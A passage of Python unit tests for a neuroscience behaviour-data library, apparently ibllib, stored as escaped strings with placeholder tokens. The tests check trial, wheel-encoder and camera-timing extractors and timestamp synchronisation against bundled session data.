'4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = 